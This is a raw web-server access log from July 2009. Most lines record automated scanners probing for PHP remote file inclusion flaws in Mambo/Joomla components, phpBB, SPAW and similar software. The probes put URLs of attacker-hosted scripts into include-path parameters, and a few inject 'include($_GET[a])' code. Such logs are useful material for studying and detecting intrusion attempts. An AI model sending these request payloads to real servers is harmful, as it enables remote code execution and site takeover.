200.101.70.1 - - [12/Jul/2009:04:13:30 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.92.85.176 - - [12/Jul/2009:04:13:39 -0400] "GET //citywriter/head.php?path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
209.59.12.99 - - [12/Jul/2009:04:13:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.92.85.176 - - [12/Jul/2009:04:13:49 -0400] "GET /logs//citywriter/head.php?path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
213.92.85.176 - - [12/Jul/2009:04:14:01 -0400] "GET /logs/error_log.Q109051400//citywriter/head.php?path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
128.241.195.146 - - [12/Jul/2009:04:15:41 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.dangblues.com/images/sistem.jpg??? HTTP/1.0" 404 265 "-" "libwww-perl/5.50"
213.92.85.176 - - [12/Jul/2009:04:16:10 -0400] "GET /logs/access_log.Q109051400//citywriter/head.php?path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
213.92.85.176 - - [12/Jul/2009:04:16:16 -0400] "GET /logs/access_log.Q109053100//citywriter/head.php?path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
200.101.70.1 - - [12/Jul/2009:04:16:56 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:16:56 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:16:56 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:16:59 -0400] "GET /logs/access_log.Q109061600//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:17:29 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:17:29 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:17:29 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:17:36 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:17:36 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:17:37 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.92.85.176 - - [12/Jul/2009:04:17:53 -0400] "GET /logs/access_log.Q109051600//citywriter/head.php?path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
70.86.154.146 - - [12/Jul/2009:04:18:24 -0400] "GET HTTP/1.1 HTTP/1.1" 400 189 "-" "Toata dragostea mea pentru diavola"
70.86.154.146 - - [12/Jul/2009:04:18:24 -0400] "GET /install.txt HTTP/1.1" 404 209 "-" "Toata dragostea mea pentru diavola"
70.86.154.146 - - [12/Jul/2009:04:18:24 -0400] "GET /cart/install.txt HTTP/1.1" 404 214 "-" "Toata dragostea mea pentru diavola"
70.86.154.146 - - [12/Jul/2009:04:18:24 -0400] "GET /zencart/install.txt HTTP/1.1" 404 217 "-" "Toata dragostea mea pentru diavola"
70.86.154.146 - - [12/Jul/2009:04:18:24 -0400] "GET /zen-cart/install.txt HTTP/1.1" 404 218 "-" "Toata dragostea mea pentru diavola"
70.86.154.146 - - [12/Jul/2009:04:18:24 -0400] "GET /zen/install.txt HTTP/1.1" 404 213 "-" "Toata dragostea mea pentru diavola"
200.101.70.1 - - [12/Jul/2009:04:18:24 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:18:24 -0400] "GET /logs/access_log.Q109062700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.86.154.146 - - [12/Jul/2009:04:18:24 -0400] "GET /shop/install.txt HTTP/1.1" 404 214 "-" "Toata dragostea mea pentru diavola"
200.101.70.1 - - [12/Jul/2009:04:18:24 -0400] "GET /logs/access_log.Q109060900//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.86.154.146 - - [12/Jul/2009:04:18:25 -0400] "GET /butik/install.txt HTTP/1.1" 404 215 "-" "Toata dragostea mea pentru diavola"
70.86.154.146 - - [12/Jul/2009:04:18:25 -0400] "GET /zcart/install.txt HTTP/1.1" 404 215 "-" "Toata dragostea mea pentru diavola"
200.101.70.1 - - [12/Jul/2009:04:18:25 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
70.86.154.146 - - [12/Jul/2009:04:18:25 -0400] "GET /shop2/install.txt HTTP/1.1" 404 215 "-" "Toata dragostea mea pentru diavola"
70.86.154.146 - - [12/Jul/2009:04:18:25 -0400] "GET /catalog/install.txt HTTP/1.1" 404 217 "-" "Toata dragostea mea pentru diavola"
70.86.154.146 - - [12/Jul/2009:04:18:25 -0400] "GET /boutique/install.txt HTTP/1.1" 404 218 "-" "Toata dragostea mea pentru diavola"
70.86.154.146 - - [12/Jul/2009:04:18:25 -0400] "GET /cart/install.txt HTTP/1.1" 404 214 "-" "Toata dragostea mea pentru diavola"
70.86.154.146 - - [12/Jul/2009:04:18:25 -0400] "GET /store/install.txt HTTP/1.1" 404 215 "-" "Toata dragostea mea pentru diavola"
209.59.12.99 - - [12/Jul/2009:04:18:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.182.124.148 - - [12/Jul/2009:04:18:59 -0400] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.813"
64.182.124.148 - - [12/Jul/2009:04:19:01 -0400] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.813"
64.182.124.148 - - [12/Jul/2009:04:19:03 -0400] "GET /logs/access_log.Q109051200/components/com_facileforms/facileforms.frame.php?ff_compath=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.813"
64.182.124.148 - - [12/Jul/2009:04:19:04 -0400] "GET /logs/access_log.Q109061200/components/com_facileforms/facileforms.frame.php?ff_compath=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.813"
200.101.70.1 - - [12/Jul/2009:04:19:11 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:19:11 -0400] "GET /logs/access_log.Q109060900//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:19:11 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:19:12 -0400] "GET /logs/access_log.Q109062700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:04:19:39 -0400] "GET //sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:04:19:41 -0400] "GET /logs/access_log.Q109053100//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:04:19:41 -0400] "GET /logs//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:04:19:45 -0400] "GET //sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:04:19:46 -0400] "GET /logs//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:04:19:48 -0400] "GET /logs/access_log.Q109053100%20%20//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:04:20:28 -0400] "GET ////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:04:20:28 -0400] "GET /logs////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:04:20:28 -0400] "GET /logs/access_log.Q109052700%20%20////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:04:20:33 -0400] "GET /logs/access_log.Q109052300%20%20////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:20:49 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:20:51 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:20:51 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:04:20:55 -0400] "GET //sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:04:20:55 -0400] "GET /logs//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:04:20:55 -0400] "GET /logs/access_log.Q109053100//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
72.55.179.121 - - [12/Jul/2009:04:21:04 -0400] "GET /?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
72.55.179.121 - - [12/Jul/2009:04:21:04 -0400] "GET /logs/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 9190 "-" "Mozilla/5.0"
72.55.179.121 - - [12/Jul/2009:04:21:04 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
72.55.179.121 - - [12/Jul/2009:04:21:04 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
72.55.179.121 - - [12/Jul/2009:04:21:04 -0400] "GET /logs/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 9190 "-" "Mozilla/5.0"
72.55.179.121 - - [12/Jul/2009:04:21:04 -0400] "GET /?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
66.249.68.70 - - [12/Jul/2009:04:21:07 -0400] "GET /images/items/0032270_thumb.jpg HTTP/1.1" 200 1646 "-" "Googlebot-Image/1.0"
72.55.179.121 - - [12/Jul/2009:04:21:22 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
72.55.179.121 - - [12/Jul/2009:04:21:23 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:21:38 -0400] "GET /logs/access_log.Q109052900//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:21:39 -0400] "GET /logs/access_log.Q109052900//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:04:23:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
84.207.17.120 - - [12/Jul/2009:04:24:29 -0400] "GET /logs/access_log.Q109052300////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:04:24:29 -0400] "GET /logs/access_log.Q109052700////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
193.254.241.12 - - [12/Jul/2009:04:27:01 -0400] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
66.249.68.70 - - [12/Jul/2009:04:27:30 -0400] "GET /logs/error_log.Q108052800 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.253.240.80 - - [12/Jul/2009:04:27:38 -0400] "GET /logs/access_log.Q109060200//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:04:27:38 -0400] "GET //spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:04:27:38 -0400] "GET /logs//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:04:28:16 -0400] "GET /logs/access_log.Q109070800//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
218.27.203.107 - - [12/Jul/2009:04:28:25 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Jul/2009:04:28:25 -0400] "GET /logs/access_log.Q109060500//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Jul/2009:04:28:25 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:04:28:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.55.179.121 - - [12/Jul/2009:04:31:29 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.55.179.121 - - [12/Jul/2009:04:31:29 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.55.179.121 - - [12/Jul/2009:04:31:54 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.55.179.121 - - [12/Jul/2009:04:31:54 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.189.39.159 - - [12/Jul/2009:04:32:39 -0400] "GET /logs///skin/zero_vote/setup.php?%20dir=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.189.39.159 - - [12/Jul/2009:04:32:39 -0400] "GET ///skin/zero_vote/setup.php?%20dir=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.189.39.159 - - [12/Jul/2009:04:32:39 -0400] "GET /logs/access_log.Q109051800///skin/zero_vote/setup.php?%20dir=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.189.39.159 - - [12/Jul/2009:04:33:08 -0400] "GET /logs/access_log.Q109051300///skin/zero_vote/setup.php?%20dir=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:04:34:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.70 - - [12/Jul/2009:04:38:44 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L013410490F4476006961011+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [12/Jul/2009:04:39:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.159.63.3 - - [12/Jul/2009:04:40:33 -0400] "GET /logs/access_log.Q109062300%20%20/voir.php?inc=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.159.63.3 - - [12/Jul/2009:04:40:33 -0400] "GET /logs/voir.php?inc=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
67.159.63.3 - - [12/Jul/2009:04:40:33 -0400] "GET /voir.php?inc=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
67.159.63.3 - - [12/Jul/2009:04:40:41 -0400] "GET /logs/voir.php?inc=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
67.159.63.3 - - [12/Jul/2009:04:40:41 -0400] "GET /logs/access_log.Q109062300%20%20/voir.php?inc=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.159.63.3 - - [12/Jul/2009:04:40:42 -0400] "GET /voir.php?inc=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
216.120.237.150 - - [12/Jul/2009:04:41:48 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 227 "-" "libwww-perl/5.811"
62.128.135.52 - - [12/Jul/2009:04:42:22 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
209.59.12.99 - - [12/Jul/2009:04:44:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.253.240.80 - - [12/Jul/2009:04:45:32 -0400] "GET /logs/access_log.Q109060100//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:04:45:32 -0400] "GET //spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:04:45:32 -0400] "GET /logs//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:04:45:40 -0400] "GET /logs/access_log.Q109051800//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
204.62.55.12 - - [12/Jul/2009:04:46:19 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
204.62.55.12 - - [12/Jul/2009:04:46:23 -0400] "GET /logs/error_log.Q108111400 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
204.62.55.12 - - [12/Jul/2009:04:46:21 -0400] "GET /logs/access_log.Q109051500 HTTP/1.1" 200 6117848 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
213.92.85.176 - - [12/Jul/2009:04:47:40 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
213.92.85.176 - - [12/Jul/2009:04:47:44 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
213.92.85.176 - - [12/Jul/2009:04:47:49 -0400] "GET /logs/access_log.Q109060200//newspublish/include.php?path%5Bdocroot%5D=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
89.223.3.98 - - [12/Jul/2009:04:48:28 -0400] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:04:48:28 -0400] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:04:48:28 -0400] "GET /logs/access_log.Q109060600//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:04:48:28 -0400] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:04:48:28 -0400] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:04:48:28 -0400] "GET /logs/error_log.Q109062900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
89.223.3.98 - - [12/Jul/2009:04:48:29 -0400] "GET /logs/access_log.Q109060600//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:04:48:29 -0400] "GET /logs/access_log.Q109052700//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:04:48:29 -0400] "GET /logs/access_log.Q109052700//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:04:48:29 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
84.207.17.120 - - [12/Jul/2009:04:48:29 -0400] "GET /logs/error_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
84.207.17.120 - - [12/Jul/2009:04:48:29 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
84.207.17.120 - - [12/Jul/2009:04:48:29 -0400] "GET /logs/error_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
84.207.17.120 - - [12/Jul/2009:04:48:29 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
